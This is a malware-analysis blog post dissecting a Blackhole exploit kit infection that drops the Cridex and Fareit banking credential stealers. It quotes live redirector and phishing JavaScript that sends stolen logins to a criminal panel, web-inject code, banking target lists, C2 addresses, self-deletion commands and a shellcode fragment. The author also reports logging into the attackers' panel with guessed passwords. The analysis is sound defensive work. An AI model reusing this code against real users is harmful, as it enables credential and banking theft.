Friday, January 18, 2013

Cridex + Fareit Infection Analysis - "dozakialko.ru:8080" A Credential Stealer Case

[NEW] Fri Jan 18 13:44:56 JST 2013 The New Infector Domain of dfudont.ru:8080 was detected & analyzed-->>[HERE] PS: dfudont.ru:8080 was also using same payload (at this moment)

The Background

Yesterday we found infection of spam which lead us to some url like below:
h00p://www.piastraollare.com/upload.htm 
h00p://kompot.designcon.tmweb.ru/upload.htm 
We went down to analysis, but had no chance to blog it, just put scratch in twitter: Today I just read the infection report via Spam posted by Conrad of Dynamoo Blog here -->>[Dynamoo] & my heart was called to write down about the analysis payload details + what that malware actually does as per seen yesterday. People should know exactly what really the threat is. I took the second url to check:
--23:07:05--  h00p://kompot.designcon.tmweb.ru/upload.htm
           => `upload.htm'
Resolving kompot.designcon.tmweb.ru... 176.57.216.3
Connecting to kompot.designcon.tmweb.ru|176.57.216.3|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 423 [text/html]
23:07:06 (14.16 MB/s) - `upload.htm' saved [423/423]
That contains the javascript redirector to the blackhole exploit infector.
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dozakialko.ru:8080/forum/links/column.php";}
</script>
.  :
Accessing the url above to found the Blackhole Landing Page using the obfuscation code of PluginDetect 0.7.9 The obfuscation code looks like this: After I decoded it, the de-obfuscated script appeared -->>[PASTEBIN] I followed our own-made guide here -->>[MMD-GUIDE] to grab the exploit components & the payloads served by this infector, the infector details are so indentical (and so does the Bad Actors behind this too) so there's no need to describe it all over again. The components contains: 2(two) PDFs, 2(two) JARs, 2(two) SWFs exploiter & a payload. Below is the picture of the catches I tweeted including the infector url & landing page, the payload was detected by 2(two) AV products only: For your convenience you can check the VT detection ration of each sample below: [infector] [landing-page] [PDF1] [PDF2] [JAR1] [JAR2/0day] [SWF1] [SWF2] [payload]

The Payload

This payload was saved in many names, the one I fetched was info.exe, the naming itself was actually set by the server during the download request processed, for instance you'll see the snipped download logs below:
Resolving dozakialko.ru... seconds 0.00, 212.112.207.15, 89.111.176.125, 91.224.135.20
Caching dozakialko.ru => 212.112.207.15 89.111.176.125 91.224.135.20
Connecting to dozakialko.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t HTTP/1.0
Referer: MalwareMustDie Knocking on your Doors..
Host: dozakialko.ru:8080
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:28:13 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Wed, 16 Jan 2013 16:28:14 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
01:28:21 (80.99 KB/s) - `info.exe' saved [197632/197632]
The file looks like this:
Sections:
   .text 0x1000 0x1e7fc 126976
   .rdata 0x20000 0xc578 53248
   .data 0x2d000 0x3e80 12288
   .rsrc 0x31000 0x1b4 4096

Entry Point...................: 0x2b0e
Virtual Address...............: 0x40370e
Compilation timedatestamp.....: 2012-10-14 00:30:11
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x0000370E
Trace Compiler................: Borland Delphi 3.0

Hexed: 

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   B2 69 F6 96 F6 08 98 C5 F6 08 98 C5 F6 08 98 C5    .i..............
0090   8F 29 9C C5 A5 08 98 C5 C0 2E 93 C5 49 08 98 C5    .)..........I...
00A0   8D 14 94 C5 7B 08 98 C5 F6 08 99 C5 C4 08 98 C5    ....{...........
00B0   78 00 C7 C5 CB 08 98 C5 99 17 9C C5 C3 08 98 C5    x...............
00C0   52 69 63 68 F6 08 98 C5 00 00 00 00 00 00 00 00    Rich............
00D0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 04 00    ........PE..L...
00E0   93 07 7A 50 00 00 00 00 00 00 00 00 E0 00 03 01    ..zP............
This is Trojan Cridex, it is a plain PE that we can be reversed well if you would like to analyze it deeper. Just needs a bit surgery to remove the trailing chars like below:
0x00F79B   bbbb:
0x00F8A7   bbbb:
0x00F8DF   bbbb:
0x00F916   bbbb:
0x00F94A   bbbb:
0x00F983   bbbb:
0x00F9BD   bbbb:
0x00F9ED   bbbb:
  :        :
0x010193   bbbbbbbbbbbbbbBbb
0x0101AE   GbbbrcbbRbbbrcbbbbbbbbbbbbb"bb"L
0x0101D6   Obbb"cbbrbbb"cbbbbbbbbbbbbb"bb
0x0101FB   bbtpbbb
0x010203   cbbBbbb2cbbbbbbbbbbbbb"bb 
0x01023A   bb"b3
0x01024E   bbbb:
This payload will do self-copy itself with the API:
CopyFileW(lpExistingFileName: "%path%\sample.exe", 
lpNewFileName: "C:\Documents and Settings\User\Application Data\KB00085031.exe"
, bFailIfExists: 0x0)
and using "%s" /c "%s" to run via CMD for self-execution:
%System%CMD.EXE /c %AppData%/KB00085031.exe
As per captured: The original malware payload files was deleted by the batch comands:
@echo off
del /F /Q /A "%S"
if exist "%S" goto R
del /F /Q /A "%S"
During those process the below changes occured in registry:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00085031.exe
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 0D 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 36 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
The next thing happens is in %Temp% folder was dropped files w/size below:
Path:                                                            Size:
C:\Documents and Settings\User\Local Settings\Temp\exp1.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp2.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp3.tmp      0
C:\Documents and Settings\User\Local Settings\Temp\exp4.tmp.exe  98,304
And there were started the network activity to the below urls:
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080
With one of the captured communication is: (click to enlarge) Noted: The usage of the fake USER-AGENT below;
Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
The marked keywords are match to the reversed result of binary:
// usage of the HTTP/1.0 and HTTP/1.1 commands handling:"
GET
POST
HTTP/1.0
HTTP/1.1
multipart/form-data
boundary=
Content-Disposition
name="
filename="
Content-Type
text/
Host
Referer
User-Agent
Authorization
Accept-Encoding
Content-Length
If-Modified-Since
If-None-Match
https
Transfer-Encoding
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html                          "
The best part is, the protocol of the data sent in above network traffic is an encryption of this formats:
// The sent time, user-agent via HTTP

<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>

// Current time sent with url and data

<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>

// FTP data...

<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>

// Mail POP3 data..

<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>

// Command lines...
<cmd id="%u">%u</cmd>

// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>

// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>

// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>

// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>

// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>
The data was taken from below detected software:
Mozilla\Firefox\Profiles
cookies.*
Macromedia
chrome.exe
firefox.exe
explorer.exe
Furthermore, the BOTNET commands also detected, reminds me of Zbot:
settings
commands
hash
httpshots
formgrabber
redirects
bconnect
httpinjects
modify
pattern
replacement
conditions
actions
redirect
process
  :(etc)
Some crypto traces:
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
It was all result of the memory saved data of KB00085031.exe/Cridex.

Where is "that" Trojan Fareit? What's that?

If we move on, in dropped files in %Temp% there is a malware called Fareit trojan.
2013/01/17  02:38  98,304 exp4.tmp.exe 
MD5: 6cccfd22d1694ce0a4a65c89604d998e
Just before Cridex process stopped Fareit was executed: By the way the binary looks like this: This is the real deal, what the bad guys really want to implement our our PC. A genuine trojan of credential stealer, backdoor, phishing client. Binary looks like:
Sections:
   .text 0x1000 0x10ae4 69632
   .data 0x12000 0x1006c0 4096
   .rsrc 0x113000 0x4334 20480

Compilation timedatestamp.....: 2003-09-22 02:08:51
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00001296
Virtual Address...............: 0x401296
Hex:
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   3B 3A 67 1A 7F 5B 09 49 7F 5B 09 49 7F 5B 09 49    ;:g..[.I.[.I.[.I
0090   76 23 8D 49 61 5B 09 49 76 23 9C 49 6F 5B 09 49    v#.Ia[.Iv#.Io[.I
00A0   76 23 9A 49 7C 5B 09 49 7F 5B 08 49 29 5B 09 49    v#.I|[.I.[.I)[.I
00B0   76 23 8A 49 1F 5B 09 49 76 23 9B 49 7E 5B 09 49    v#.I.[.Iv#.I~[.I
00C0   76 23 9D 49 7E 5B 09 49 76 23 98 49 7E 5B 09 49    v#.I~[.Iv#.I~[.I
00D0   52 69 63 68 7F 5B 09 49 50 45 00 00 4C 01 03 00    Rich.[.IPE..L...
00E0   B3 59 6E 3F 00 00 00 00 00 00 00 00 E0 00 03 01    .Yn?............
00F0   0B 01 08 00 00 10 01 00 00 10 01 00 00 00 00 00    ................
0100   96 12 00 00 00 10 00 00 00 20 01 00 00 00 40 00    ......... ....@.
Seriously trying to fake itself:
0x01642A   MS Shell Dlg
0x016492   &Restart
0x0164BE   &Do Not Restart
0x0164E2    Dial-Up Networking Command Line
0x0165DE   %2%3%4%5%6
0x0168EA   'entry' alone selects the entry in the phonebook dialog
0x01695C   Dial-Up Networking
0x016B2C   HDial-Up Networking provides Windows NT's PPP and SLIP protocol support.
0x016BBE   XDial-Up Networking is currently uninstalled.  Press 'Install' to install and configure.
0x016D02   WYou must shut down and restart your computer before the new settings will take effect.
0x016DB2   *Do you want to restart your computer now?
0x016E08   IYou must be logged on as an Administrator to install Dial-Up Networking.
As a fake Microsoft Tools:
0x01701A   CompanyName
0x017034   Microsoft Corporation
0x017066   FileDescription
0x017088   Security Configuration Wizard Viewer
0x0170DA   FileVersion
0x0170F4   6.0.6001.18000 (longhorn_rtm.080118-1840)
0x01714E   InternalName
0x017168   SCWViewer
0x017182   LegalCopyright
0x0171A2    Microsoft Corporation. All rights reserved.
0x017202   OriginalFilename
0x017224   SCWViewer.exe
0x017246   ProductName
0x017286    Operating System
0x0172B2   ProductVersion
0x0172D0   6.0.6001.18000
Some parts that need to be cut before reversing..
0x008E3C   0000000000000000000000000000000000000000
0x009375   "000000000000000000000000000000000000000000000000000000000000000000000000000&
0x0096EF   00000000000000000000000000000000000000000000000000000000000000
0x009D92   ]00000000000000000000000000000000000
0x00A92B   <0000000000000000F
0x00B1AE   0000000000000000000000000000000000000000000000000000
0x00B573   L00000000000000000000000000000000000000000000000000000000000000000
0x00B5DA   000000000000000000000000000000000000000000000000000000000000000000000000000000
0x00BE0F   00000000000000000Q
0x00C179   000000000000000000000000000000000000000000000000000000000000000000000A
You'll find the VT report in here --->>[VIRUS-TOTAL] What this trojan does is firstly downloading the config file from the CNC and save it into the registry. PoC? here: The huge data downloaded via HTTP from the remote host.. With the binary data below: This data will be saved in Registry as hex-binary below: If you take the hex and see it in the ASCII viewer will look like this: ↑This is what so-called Trojan Fareit's config, it is made to be executed when the Trojan Parfeit is activated in memory, it is in the tagged HTML-like formats. In the following section I will try to explain what's inside this config file.

What was stolen?

That config file is explaining many things. Below is what was stolen...
"cash & wires accounts"


 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
 <httpshots><url type="deny">\.(css|js)($|\?)</url>
 <url contentType="^text/(html|plain)">\.com/k1/</url>
 <url contentType="^text/(html|plain)">/ach/</url>
 <url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
 <url contentType="^text/(html|plain)">/bb/logon/</url>
 <url contentType="^text/(html|plain)">chase\.com</url>
 <url contentType="^text/(html|plain)">/cashman/</url>
 <url contentType="^text/(html|plain)">/cashplus/</url>
   :        :                :          :
 <url contentType="^text/(html|plain)">achredirect\.aspx</url>
 <url contentType="^text/(html|plain)">cbonline</url>
 <url contentType="^text/(html|plain)">/ebc_ebc1961/</url>
 <url contentType="^text/(html|plain)">/ibs\.</url>
 <url contentType="^text/(html|plain)">/ibws/</url>
 <url contentType="^text/(html|plain)">/icm/</url>
 <url contentType="^text/(html|plain)">/icm2/</url>
 <url contentType="^text/(html|plain)">/inets/</url>
 <url contentType="^text/(html|plain)">/livewire/</url>
 <url contentType="^text/(html|plain)">/loginolb/loginolb</url>
 <url contentType="^text/(html|plain)">/netbnx/</url>
 <url contentType="^text/(html|plain)">/olbb/</url>
 <url contentType="^text/(html|plain)">/phcp</url>
 <url contentType="^text/(html|plain)">/sbuser/</url>
 <url contentType="^text/(html|plain)">/smallbiz/</url>
 <url contentType="^text/(html|plain)">/wcmpw/</url>
 <url contentType="^text/(html|plain)">/webcm/</url>
 <url contentType="^text/(html|plain)">/wire/</url>
 <url contentType="^text/(html|plain)">/wires/</url>

"online bankings..."

 <url contentType="^text/(html|plain)">2checkout\・com</url>
 <url contentType="^text/(html|plain)">ablv\・com</url>
 <url contentType="^text/(html|plain)">access\・jpmorgan\.com</url>
 <url contentType="^text/(html|plain)">access\.usbank\・com</url>
 <url contentType="^text/(html|plain)">accessbankplc\・com</url>
 <url contentType="^text/(html|plain)">accountoverview\.aspx</url>
 <url contentType="^text/(html|plain)">accurint\.com</url>
 <url contentType="^text/(html|plain)">achieveaccess\・citizensbank\.com</url>
 <url contentType="^text/(html|plain)">achpayment</url>
 <url contentType="^text/(html|plain)">achweb\.unionbank\.com</url>
 <url contentType="^text/(html|plain)">achworks\・com</url>
 <url contentType="^text/(html|plain)">alltimetreasury\.pacificcapitalbank\.com</url>
 <url contentType="^text/(html|plain)">alphabank\・com</url>
 <url contentType="^text/(html|plain)">amegybank\・com/</url>
 <url contentType="^text/(html|plain)">anb\.portalvault\・com</url>
 <url contentType="^text/(html|plain)">atbonlinebusiness\・com</url>
   :     :                    :                :
 <url contentType="^text/(html|plain)">westfield\.accounts\-in\-view\.com</url>
 <url contentType="^text/(html|plain)">wiretransfer</url><
  url contentType="^text/(html|plain)">wtdirect\.com</url>
 </httpshots>
 
"SNS Accounts.."

 <formgrabber>
   <url type="deny">\.(swf)($|\?)</url>
   <url type="deny">/isapi/ocget.dll</url>
   <url type="allow">^https?://aol・com/.*/login/</url>
   <url type="allow">^https?://accounts.google・com/ServiceLogin</url>
   <url type="allow">^https?://login.yahoo・com/</url>
   <url type="allow">^https?://login.live・com/</url>
   <url type="deny">^https?://(\w+\.)?aol・com</url>
   <url type="deny">^https?://(\w+\.)?facebook・com/</url>
   <url type="deny">^https?://(\w+\.)?google</url>
   <url type="deny">^https?://(\w+\.)?yahoo</url>
   <url type="deny">^https?://(\w+\.)?youtube・com</url>
   <url type="deny">^https?://(\w+\.)?live.com</url>
   <url type="deny">^https?://(\w+\.)?twitter・com</url>
   <url type="deny">^https?://(\w+\.)?vk・com</url>
   <url type="allow">.*</url>
   </formgrabber>
How the data to be passed:
"Redirecting data to POST.."
   
   <redirect><pattern>jQuatro.js</pattern>
   <process><![CDATA[http://62.76.177.123/mx/3A/in/cp.php?h=8]]></process>
   </redirect></redirects>
   
"BOTNET Connection..."
   
   <bconnect>85.143.166.72:443</bconnect>
   <httpinjects><httpinject><conditions>
How it was encrypted:
"Encrypt the passwords...."

   <replacement><![CDATA[
 <script type='text/javascript'>
 if(typeof window.EncryptPassword=='function')
 {
   var fn=window.EncryptPassword;
   window.EncryptPassword=function(id)
   {
     try
     { var e=document・getElementById(id);
       var i=document.createElement("input");
       i.type="hidden";
       i.name="OPN";
       i.value=e.value;
       document.Form1.appendChild(i);
A complete list of online banking site targets:
 <url ...">^https://(www\.|)cashanalyzer\.com/</url>
 <url ...">^https://(www\.|)enternetbank\.com/</url>
 <url ...">^https://(www\.|)nashvillecitizensbank\.com/</url>
 <url ...">^https://.*citizensbank\.com/</url>
 <url ...">^https://.+\.firsttennessee\.com/</url>
 <url ...">^https://.*firstcitizens\.com/</url>
 <url ...">^https://(bolb\-(west|east)|www)\.associatedbank\.com/</url>
 <url ...">^https://.*secure\.fundsxpress\.com/</url>
 <url ...">^https://usgateway\d*\.rbs\.com/</url>
 <url ...">^https://(www\.|)svbconnect\.com/</url>
 <url ...">^https?://(www\d*\.|)(ntrs|northerntrust)\.com/</url>
 <url ...">^https://cib\.bankofthewest\.com/</url>
 <url ...">^https://.+\.unionbank\.com/</url>
 <url ...">^https://webbankingforbusiness\.mandtbank\.com/</url>
 <url ...">^https://ifxmanager\.bnymellon\.com/</url>
 <url ...">^https://(ecash\.|.+/cashman/)</url>
 <url ...">^https://banking\.calbanktrust\.com/</url>
 <url ...">^https://.+/(wcmfd/wcmpw|phcp/servlet)/</url>
 <url ...">^https://(www\.|)efirstbank\.com/</url>
 <url ...">^https://singlepoint\.usbank\.com/</url>
 <url ...">^https://business-eb\.ibanking-services\.com/</url>
 <url ...">^https://www8\.comerica\.com/</url>
 <url ...">^https://.+\.53\.com/</url>
 <url ...">^https://businessonline\.tdbank\.com/</url>
 <url ...">^https://treas-mgt\.frostbank\.com/</url>
 <url ...">^https://.+\.huntington\.com/</url>
 <url ...">^https://businessaccess\.citibank\.citigroup\.com/</url>
 <url ...">^https://.+/cmserver/</url>
 <url ...">^https://cashmanager\.mizuhoe-treasurer.com/</url>
 <url ...">^https://wellsoffice\.wellsfargo\.com/</url>
 <url ...">^https://.+/onlineserv/CM/</url>
 <url ...">^https://.+/ebc_ebc1961/</url>
 <url ...">^https://(www\.|)sterlingwires\.com/</url>
 <url ...">^https://(www\.|)treasury\.pncbank\.com/</url>
 <url ...">^https://securentrycorp\.</url>
 <url ...">^https://.*ebanking-services\.com/</url>
 <url ...">^https://bnycash\.bankofny\.com/</url>
 <url ...">^https://(.+\.web\-access|webinfocus\.mandtbank)\.com/</url>
 <url ...">^https://.*businessmanager\.com/</url>
 <url ...">^https://businessportal\.mibank\.com</url>
 <url ...">^https://.+/Common/SignOn/</url>
 <url ...">^https://commercial\.wachovia\.com/Online/Financial/Business/</url>
 <url ...">^https://.+\.blilk\.com/</url>
 <url ...">^https://webcmpr\.bancopopular\.com/K1/</url>
 <url ...">^https://trz\.tranzact\.org/</url>
 <url ...">^https://.+\.tdcommercialbanking\.com/</url>
 <url ...">^https://.+\.ffinonline\.com/</url>
 <url ...">^https?://(www\.|)ffbtexas\.com/</url>
 <url ...">^https?://.+\.bancosabadellmiami\.com/</url>
 <url ...">^https://server\d+\.cey-ebanking\.com/CLKCCM/</url>
 <url ...">^https://.+\.ffrontier\.com/</url>
 <url ...">^https://.+\.rbsm\.com/</url>
 <url ...">^https://.+\.firstmerit</url>
 <url ...">^https://.+\.fcsolb\.com</url>
 <url ...">^https://cs\.directnet\.com</url>
 <url ...">^https://.+\.bankofcyprus\.com/</url>
 <url ...">^https://www\.hellenicnetbanking\.com/</url>
 <url ...">^https://www\.e\-moneyger\.com/</url>
 <url ...">^https://.+\.anzdirect\.co\.nz/online/</url>
 <url ...">^https://.+\.anz\.com/inetbank/</url>
 <url ...">^https://.+\.bendigobank\.com\.au/</url>
 <url ...">^https://ib\.nab\.com\.au/nabib/</url>
 <url ...">^https://.+\.nabconnect\.nab\.com\.au/auth/login/</url>
 <url ...">^https://.+\.commbiz\.commbank\.com\.au/</url>
 <url ...">^https://compassconnect\.compassbank\.com/</url>
Below is the method to redirect into phishing sites...
<replacement> <url contentType="^text/(html|plain)">^h00ps://direct.53・com/</url>
 META HTTP-EQUIV="Refresh" CONTENT="0; URL=h00ps://express.53.com/express/logon・jsp
Also aiming specific url accessed....
 <url ...><![CDATA[^h00ps://online\(.)americanexpress\(.)com/myca/.*?request_type=authreg_acctAccountSummary]]>
 <url ...>h00ps://businessaccess\(.)citibank\.citigroup(.)com/cbusol/signon\.do</url>
You can contact me to see the config data extracted.

Phishing

You'll see these phishing codes....
var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').
Some trails on the phishing forms.. Related to the phishing form there's a code for credit card fake processing..
function check_cc(cardnumber) {
     var cardNo = cardnumber.replace(/[^0-9]/g, "");
     if (cardNo.length < 15 || cardNo.length > 16) {
       return false;
     }
     var checksum = 0;
     var j = 1;
     var calc;
     for (i = cardNo.length - 1; i >= 0; i--) {
       calc = Number(cardNo.charAt(i)) * j;
       if (calc > 9) {
         checksum = checksum + 1;
         calc = calc - 10;
       }
       checksum = checksum + calc;
       if (j == 1) {
         j = 2;
       } else {
         j = 1;
       }
     }
     if (checksum % 10 != 0) {
       return false;
     }
     return true; }

What Software's Credential is Accessed?

Morever in memory, was found trailing path of credential detection:
 Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
   :(etc)
With the complete list -->>[PASTEBIN] You'll see list of most of the softwares used internet using username and passwords were aimed; i.e.: Browsers, intranet tools, FTP, Plugins, and ..Mailer(POP/SMTP/IMAP).

How Trojan Fareit Sent the Credentials?

How this credentials sent? In binary I detected HTTP POST method coded below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
To the remote hosts below:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
With the PoC I detected below: Be noted the usage of below USER-AGENT:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

The Control and Center Trails

It has the trail of Admin Panel for the Bad Actors to access.
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
Which was used to send the phished information with formula below:
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']();
In the memory found the large combination of passwords for this panel, I posted some to the VT comment yesterday:
phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty     soccer     happy    shadow     faith      iloveyo
jesus      superman   matrix   christ     summer     mustang
abc123     michael    pass     sunshine   ashley     helpme
letmein    cheese     aaaaaa   master     buster     justin
test       internet   amanda   computer   heaven     jasmine
love       joshua     nothing  princess   pepper     orange
password1  fuckyou    ginger   tigger     hunter     testing
hello      blessed    mother   football   lovely     apple
monkey     baseball   snoopy   angel      andrew     michell
dragon     starwars   jessica  jesus1     thomas     peace
trustno1   purple     welcome  whatever   angels     secret
freedom    charlie    grace killer     daniel     william
jennifer     :    
Frankly, yesterday I happened to test accessed the site with some of the passwords and it worked, but today it looks like closed..

Research Materials

Here's the samples -->>[MEDIAFIRE] Please contact me via Twitter by mentioned to @MalwareMustDie for the research data.

Additional: New Infector of dfudont.ru:8080

@unixfreaxjp /malware]$ date Fri Jan 18 13:44:56 JST 2013

BHEK Landing page/PluginDetect

Downloads:
--10:58:57--  
h00p://dfudont.ru:8080/forum/links/column.php
           => `column.php'
Resolving dfudont.ru... 89.111.176.125, 91.224.135.20, 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[      <=>                            ] 117,545       70.64K/s
10:59:01 (70.51 KB/s) - `column.php' saved [117545]
Obfuscated version landing page: The deobfuscated version is here -->>[HERE]

Some Changes in dfudont.ru:8080 infection

New shellcode in plugin detect:
function getShellCode(){
  var a = "
8282!%5154!%O415!%94eO!%a451!%eOa4!%9134!%c451!%74eO!%2191!%9124!%9121!%21b1!%9134!%3421!%
2191!%b1b1!%a121!%21b1!%9154!%3421!%2191!%a1e5!%d451!%eOO5!%b1b1!%1421!%2191!%9114!%6421!%
2191!%b181!%e451!%71a4!%O485!%6O85!%5464!%44d5!%b474!%b57O!%6434!%4414!%547O!%a5d5!%e474!%
817O!%81O1!%21O1!%a5d5!%c56O!%7464!%d5c4!%c4e4!%7O7O!%8521!%c5c5!%85O4!%237O!%15e1!%eee6!%
      :
583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%Ofb2!%423a!%c7cO!%4c7d!%5ae6!%4236!%e43a!%b25f!%
